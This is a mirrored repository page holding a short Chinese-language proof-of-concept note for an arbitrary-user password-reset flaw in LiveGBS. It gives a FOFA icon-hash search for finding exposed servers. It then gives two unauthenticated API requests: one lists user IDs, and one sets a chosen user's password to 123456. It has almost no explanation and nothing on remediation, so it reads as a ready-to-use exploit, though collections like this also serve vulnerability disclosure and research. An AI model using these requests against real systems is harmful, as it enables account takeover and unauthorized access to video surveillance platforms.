admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/LiveGBS/LiveGBS任意用户密码重置漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

671 B
Raw Blame History

LiveGBS任意用户密码重置漏洞

LiveGBS部分接口存在未授权访问导致可以通过组合漏洞修改任意用户密码

fofa

icon_hash="-206100324"

poc

获取用户id

/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc

image-20240820155005009

通过id更改用户密码

/api/v1/user/resetpassword?id=22&password=123456

image-20240820155041297

漏洞来源